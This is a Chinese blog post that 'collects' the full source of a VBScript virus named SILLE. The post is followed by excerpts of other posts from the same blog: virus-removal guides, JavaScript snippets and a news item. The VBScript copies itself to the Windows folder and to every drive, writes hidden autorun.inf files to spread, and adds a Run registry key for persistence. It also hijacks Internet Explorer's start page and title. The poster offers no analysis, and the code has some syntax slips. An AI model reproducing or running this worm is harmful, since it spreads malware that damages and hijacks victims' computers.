收藏一个VBS病毒的代码(劫持IE)

脚本病毒,出来已经有些时间了.
大部分的杀毒软件都能够发现这种病毒了.

病毒的重点部分是在这个ie.vbs文件中,其中的代码如下:

关于代码的分析留在以后再做,

VBS代码

‘virus name is SILLE
‘By Winxp32
on error resume next
dim ms,winpath,fs,fd,mf,atr,tf,rg,nt,chk,sd
atr = "[autorun]"&vbcrlf"shellexecute=wscript.exe ie.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
chk = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
ms=ms&text.readline
ms=ms & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\ie.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\ie.vbs",2,true)
tf.write ms
tf.close
set tf = fs.getfile(winpath & "\ie.vbs")
tf.attributes = 39
for each fd in fs.drives
If (fd.drivetype = 1 or fd.drivetype = 2) and fd.path <> "A:" then
set tf=fs.getfile(fd.path "\ie.vbs")
tf.attributes =32
set tf=fs.createtextfile(fd.path "\ie.vbs",2,true)
tf.write ms
tf.close
set tf=fs.getfile(fd.path "\ie.vbs")
tf.attributes =39
set tf =fs.getfile(fd.path "\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(fd.path "\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(fd.path "\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath"\ie.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","¤¤¤¤~~~—@ SILLE"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.sille.net"
if chk <> 1 then
Wscript.sleep 333333
end if
loop while chk<>1
set sd = createobject("Wscript.shell")
sd.run winpath"\explorer.exe /e,/select, "&Wscript.ScriptFullname

JavaScript, 病毒

打印文章	这篇文章由admin于2007年07月19日 11:02 下午发表在Collection。你可以订阅RSS 2.0 也可以发表评论或引用到你的网站。

没有评论

没有引用

病毒gr80r96.dll和mx9d.sys

大约2年前 - 没有评论

处理一台中病毒的电脑,使用NOD32和360安全卫士处理一番后仍留下gr80r96.dll和mx9d.sys无法清除,这两个病毒文件在NOD32中表现为： C:\WINDOWS\system32\gr80r96.dll – Win32/BHO.NDW 木马变种 – 无法清除。 – 已隔离 – 已删除（在下次重启后） C:\WINDOWS\system32\drivers\mx9d.sys – Win32/Rootkit.Agent.NCK 木马变种 – 无法清除。 – 已隔离 – 已删除（在下次重启后）但是重启和安全模式下都无法清除，原来是因为病毒自动在系统的注册表的 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 项中把C:\WINDOWS\system32\gr80r96.dll 加入。进行安全模式的桌面亦会自动运行病毒文件，因此最安全的方法是使用“深山红叶”或者其他引导光盘中的Windows PE系统，跳过启动Windows。再删除 C:\WINDOWS\system32\gr80r96.dll 和 C:\WINDOWS\system32\drivers\mx9d.sys

找回文件夹选项里面的"隐藏受保护的操作系统文件(推荐)"复选框

大约2年前 - 2个评论

今天在分析由d.52hxsh.com传播的弹出unqbi.qb-qq.com广告窗口的病毒时，发现这个病毒把文件夹选项里面的"隐藏受保护的操作系统文件(推荐)"复选框干掉了，这种方式不同于以往把有效的DWORD值CheckedValue删除掉，新建了一个无效的字符串值CheckedValue的手段。出现这种现象是因为有些木马把自己的属性设置成隐藏、系统属性，并且把注册表中“文件夹选项中的隐藏受保护的操作系统文件”项和“显示所有文件和文件夹”选项删除，致使通过procexp可以在进程中看到，但去文件所在目录又找不到源文件，无法进行删除。在仔细对比了虚拟机和正常机器上的注册表后，发现此病毒是更改了 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden] 中的两个项，从而把"隐藏受保护的操作系统文件(推荐)"的复选框从文件夹选项中隐藏起来了。因此只需要导入本文提供的SuperHidden.reg附件即可解决问题。另一附件SHOWALL.reg则是解决无法显示所有文件的注册表。附件:superhidden.reg(1424 Byte) 附件:showall.reg(2400 Byte)

从阿里妈妈学习到的表单验证函数

大约2年前 - 1个评论

学习到的函数实现如下功能:检查当前浏览器是否为Netscape,保存当前Form表单（仅适用于IE浏览器）,校验数据的合法性,判断是否为闰年,弹出窗口,校验日期的合法性等。具体代码如下：函数的具体功能在文件的注释中有详细介绍。 JavaScript代码 //——– // 检查当前浏览器是否为Netscape //——– function isNetscape(){ app=navigator.appName.substring(0,1); if (app==‘N’) return true; else {return false;} } //——– // 保存当前Form表单（仅适用于IE浏览器） //——– function formSaveCheck(fileName){ if(isNetscape()){alert("Sorry, these function is not supported")} else document.execCommand(‘SaveAs’,null,fileName) } //——– // 校验数据的合法性 //——– function isValidReg( chars){ var re=/<|>|\[|\]|\{|\}|『|』|※|○|●|◎|§|△|▲|☆|★|◇|◆|□|▼|㊣|﹋|⊕|⊙|〒|ㄅ|ㄆ| ㄇ|ㄈ|ㄉ|ㄊ|ㄋ|ㄌ|ㄍ|ㄎ|ㄏ|ㄐ|ㄑ|ㄒ|ㄓ|ㄔ|ㄕ|ㄖ|ㄗ|ㄘ|ㄙ|ㄚ|ㄛ|ㄜ|ㄝ|ㄞ|ㄟ|ㄢ|ㄣ|ㄤ|ㄥ|ㄦ|ㄧ|ㄨ|ㄩ |■|▄|▆|\*|@|#|\^|\\/; if (re.test( chars) == true) { return false; }else{ return true;

修改Webmin解决Javascript出错提示

大约2年前 - 没有评论

登录Webmin后会在状态栏提示Javascript出错，出错位置在第9行等8个字符。查看页面的源代码发现出错的原因是字符串中多了一个换行符，本来应该在一行的现在却变成两行所以就错了。如下： JavaScript代码 <SCRIPT LANGUAGE="JavaScript"> defaultStatus="zzr logged into Webmin 1.370 on localhost.msdi.cn (Redhat Enterprise Linux 5)"; </SCRIPT> 修改/usr/libexec/webmin/mscstyle3目录下的theme.pl 文件原文： Perl代码 if ($gconfig{‘sysinfo’} == 0 && $remote_user) { print "<SCRIPT LANGUAGE=\"JavaScript\">\n"; print "defaultStatus=\"".&text(‘header_statusmsg’, ($ENV{‘ANONYMOUS_USER’} ? "Anonymous user" : $remote_user). ($ENV{‘SSL_USER’} ? " (SSL certified)" : $ENV{‘LOCAL_USER’} ? " (Local user)" : ""), $text{‘programname’},//大概是在231行，删除它，就是这句加了一个回车 &get_webmin_version(), &get_display_hostname(), $os_type.($os_version eq "*" ? "" :" $os_version")). "\";\n"; print "</SCRIPT>\n"; 你可以删除$text{‘programname’}来解决此问题，亦可以修改成如下代码： printf "defaultStatus=\"%s%s logged into Webmin %s on %s (%s %s)\";\n"; 同样将/usr/libexec/webmin/web-lib-funcs.pl文件也修改一下。大概在444行的位置。

网吧键盘比公厕“脏”400倍网吧卫生状况让人忧

大约3年前 - 没有评论

“为什么要清洗电脑?屏幕不是干净的吗?”省城红星路上一网吧老板对此不解,“电脑键盘有灰尘,我们就擦擦.”连日高温,记者走访省城部分网吧发现,不少网吧卫生状况不尽如人意,最为突出的就是室内空气污浊、上网设备污垢积存过多.而据了解,目前网吧卫生监测、检查尚属空白. 　　一边吃盒饭一边敲键盘　　7月28日,淮河路附近一网吧内,记者刚进门,便觉胸闷.键盘按键和鼠标都非常油腻,上面还有点点黑斑,当记者对网吧卫生表示不满时,老板却不以为然,“键盘从没清洗过,也没听顾客说脏”. 　　记者随后又走访了宣城路、太湖西路、金寨路等地居民区、学校附近网吧,发现有的网吧座椅长期不换,椅布吸满了油污汗液;键盘、电脑桌由于没定期清洁,表面上也积满了黑色污垢.夏天一到,这些污垢无疑会滋生细菌,记者看到还有网民一边吃盒饭,一边敲键盘. 　　网吧卫生监管尚属盲区　　记者查询目前对网吧运营有监管作用的《互联网上网服务营业场所管理条例》,发现《条例》中并无网吧卫生管理的内容.日前,有关部门接受采访时表示,“没有依据,就没有办法管,只能靠网吧自己管自己.” 　　《条例》中未提及网吧卫生,那是否属于卫生部门的监管范围?据合肥点击查看合肥及更多城市天气预报市卫生局卫生监督所有关负责人介绍,国家的《公共场所卫生管理条例》是1987年颁布的,当时尚无网吧出现,所以其规定管理内容中,并无“网吧”这一项. 　　昨天,记者随机采访了数十位市民,多数市民认为,网吧安全卫生应引起政府和社会各界关注.据了解,有关部门曾对数个网吧的200台电脑键盘进行抽样检查,发现其中存留的乙肝病毒竟然占到35%.在电脑键盘和鼠标上发现的有害细菌比公共厕所的细菌高出400倍. 　　这样的数据着实让不少家长惊心.在省城一食品公司上班的市民李阳明说,目前逛网吧的多为学生,希望通过监管,使网吧能让家长放心.据媒体报道,江苏省泰州市此前出台了《网吧卫生规范》,该《规范》也是在全国范围内首部针对网吧卫生的地方性条例.不仅如此,据透露,目前卫生部已着手修订《公共场所卫生管理条例》,网吧极可能被纳入监测范围,预计条例将会在今年修订完成. 原载《安徽商报》

360Safe安全工具

大约4年前 - 没有评论

360安全卫士产品特点： [查杀121款恶意软件]彻底摆脱乱弹广告、机器狂慢的困扰[卸载170款插件程序]仅保留需要的插件，大幅度提高系统运行效率[13000条进程知识解释]帮您准确全面的分析电脑安全状况[清理30项使用痕迹]清理使用电脑时留下的痕迹，让您踏网无痕来去无踪[查杀20万种病毒]new!内含卡巴斯基反病毒软件v6.0正式版 360安全卫士可以查杀121款恶意软件以下为您列出我们可以查杀的恶意软件列表序号名称出品公司恶意行为 1 很棒小秘书上海很棒信息技术有限公司强制安装、无法彻底删除、弹出广告、自动变形 2 DMCast桌面传媒/IE-BAR 千橡弹出广告、无法彻底删除、强制安装、浏览器劫持 3 开心运程速递插件 http://www.smartdove.com/ 强制安装、无法彻底删除、弹出广告 4 InsII&III 未知弹出广告、强制安装、无法彻底删除、自动变形 5 EliteBar 未知弹出广告、强制安装、无法彻底删除、劫持浏览器、窃取用户隐私 6 New.net 未知弹出广告、强制安装、无法彻底删除、自动恢复 7 TargetAD 很棒弹出广告、强制安装、劫持浏览器、无法彻底删除 8 ADDeliverer 未知弹出广告、劫持浏览器（篡改首页）、强制安装、无法彻底删除、 9 多多QQ表情 www.qqhelper.com 强制安装、弹出广告、无法彻底删除、自动变形 10 DmPlay弹广告软件未知弹出广告、强制安装、无法彻底删除 12 WinStdup www.borlander.cn 强制安装、弹出广告、无法彻底删除、自动变形 13 MSIbm 未知

JavaScript写的倒计时例子

大约4年前 - 没有评论

按钮可用状态倒计时…(JavaScript) 今天在一个网站注册的时候, 看到了在服务条款和声明的时候, 我同意这个按钮要等几秒钟才可用, 虽然以前也看到过, 但这几天实在是闲着无聊, 所以, 嘿, 咱也来一个吧. <form name="frm"><input type="submit" name="btnSubmit" value="我同意" /></form> <script language="javascript"><!–var sec = 9;var wait = sec * 1000;document.frm.btnSubmit.value = "我同意[" + sec + "]";document.frm.btnSubmit.disabled = true; for(var i = 0; i <= sec; i++) { window.setTimeout("TimeUpdate(" + i + ")", i * 1000);} window.setTimeout("TimeOk()", wait); function TimeUpdate(num) { if(num != sec) { var pntNum = (wait / 1000) - num; document.frm.btnSubmit.value = "我同意[" + pntNum + "]"; }} function TimeOk() { document.frm.btnSubmit.value = "我同意"; document.frm.btnSubmit.disabled = false;}//–></script> 第一种：精确到秒的javascript倒计时代码 HTML代码: <form name="form1"><div align="center" align="middle"><center>离2010年还有:<br><input type="textarea" name="left" size="35" style="text-align: center"></center></div></form><script LANGUAGE="javascript">startclock()var timerID = null;var timerRunning = false;function showtime() {Today = new Date();var NowHour = Today.getHours();var NowMinute = Today.getMinutes();var NowMonth = Today.getMonth();var NowDate = Today.getDate();var NowYear = Today.getYear();var NowSecond = Today.getSeconds();if (NowYear <2000)NowYear=1900+NowYear;Today = null;Hourleft = 23

被一个WOW木马强奸了

大约4年前 - 没有评论

怎样用REG文件删除注册表项其实很简单，我们来举个例子。先在注册表的HKEY_CURRENT_USER根键下建立一个名为“Test”的子键，然后在子键下建立一个名为“Test1”的键值。然后我们建立一个REG文件，输入以下内容：REGEDIT4[HKEY_CURRENT_USER\Test]"Test1"=-以上的文件就可以删除键值“Test1”。如果我们要删除“Test”子键，那么我们的REG文件就应该输入以下内容：REGEDIT4[-HKEY_CURRENT_USER\Test] 这是一个WOW木马，最近好像中招的人多起来了，这个小木马除了和一般的小木马一样会建立自启动项、关联文件外，它还会修改很多其它关联信息，增加了病毒被激活的机率，也给清除带来了一点点麻烦。　　　　在病毒文件没有删除之前所做的一些操作可能会调用激活病毒程序，所以在以下1和2步之间请尽量不要做多余的其它操作。顺利地删除病毒文件需要一点点技巧，在处理过程中慢慢体会吧…… 注：可用本站下载的木马杀客，来杀除病毒。之后再手工删除以下文件　　　　1. 结束病毒的进程%Windows%\smss.exe（用木马杀客系统进程可以结束）　　　　2. 删除相关文件：　　C:\MSCONFIG.SYS　　%Windows%\1.com　　%Windows%\ExERoute.exe　　%Windows%\explorer.com　　%Windows%\finder.com　　%Windows%\smss.exe　　%Windows%\Debug\DebugProgram.exe　　%System%\command.pif　　%System%\dxdiag.com　　%System%\finder.com　　%System%\MSCONFIG.COM　　%System%\regedit.com　　%System%\rundll32.com　　%ProgramFiles%\Internet Explorer\iexplore.com　　%ProgramFiles%\Common Files\iexplore.pif　　　　3. 恢复EXE文件关联　　删除[HKEY_CLASSES_ROOT\winfiles]项　　　　4. 删除病毒启动项：　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]　　"Torjan Program"="%Windows%\smss.exe"　　修改[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]下　　"shell"="Explorer.exe 1"　　为　　"shell"="Explorer.exe"　　　　5. 恢复病毒修改的注册表信息：　　(1)分别查找“command.pif”、“finder.com”、“rundll32.com”的信息，将“command.pif”、“finder.com”、“rundll32.com”修改为“rundll32.exe”　　　　(2)查找“explorer.com”的信息，将“explorer.com”修改为“explorer.exe”　　　　(3)查找“iexplore.com”的信息，将“iexplore.com”修改为“iexplore.exe”　　　　(4)查找“iexplore.pif”的信息，将找到的“%ProgramFiles%\Common Files\iexplore.pif”修改为“%ProgramFiles%\Internet Explorer\iexplore.exe”　　　　　6 在command模式下写入assoc .exe=exefile修复exe关联，这样exe文件才可以打的开　 7 在本站下载木马杀客，来修复exe文件

再遇病毒,Copy.exe

大约4年前 - 1个评论

当然不是我变态啊,只是自己有点喜欢杀毒后的快感. 病毒是随着电脑技术成长起来的,可以说如果没有病毒,那么就没有当前这么发达的技术. 而我的电脑技术也是在和病毒的斗争中长进的.这些日子在搞毕业设计,常去打印文章结果不小心就中毒了.不过还好这个东西没有破坏系统,要不我又要汗一下了.居然被蛇咬了.每个盘都被设成了自动播放.卡巴也报警了. 我也不是省油的灯啊. 在文件夹选项里打开显示所以文件和系统文件.就看到了每个盘下有三个文件:atuorun.ini,copy.exe,host.exe再看一下进程:有三个可疑的进程.c:\windows\system32\temp1.exec:\windows\system32\temp2.exec:\windows\svchost.exe 这样下来基本就可以确定这个病毒是怎么运行的了啊.先干掉上面的那三个进程,找到它们再删除,然后删掉每个盘下的那三个文件,不过要注意的是不要双击打开磁盘啊,要右键再点打开,要不又会生成系统盘下的那些文件啊.之后,Regedit打开注册表,查找"c:\windows\svchost.exe",删除所有找到的项目,再查找"copy.exe"同样也全部删除. 重启电脑,一切又OK了. 经验:关闭"磁盘的自动运行(在组策略里关掉)",不要双击打开U盘.

24小时只弹一次广告的代码

大约4年前 - 1个评论

红色部分换成你自己的function setCookie(name, value, expire) { window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));} function getCookie(Name) { var search = Name + "="; if (window.document.cookie.length > 0) { // if there are any cookies offset = window.document.cookie.indexOf(search); if (offset != -1) { //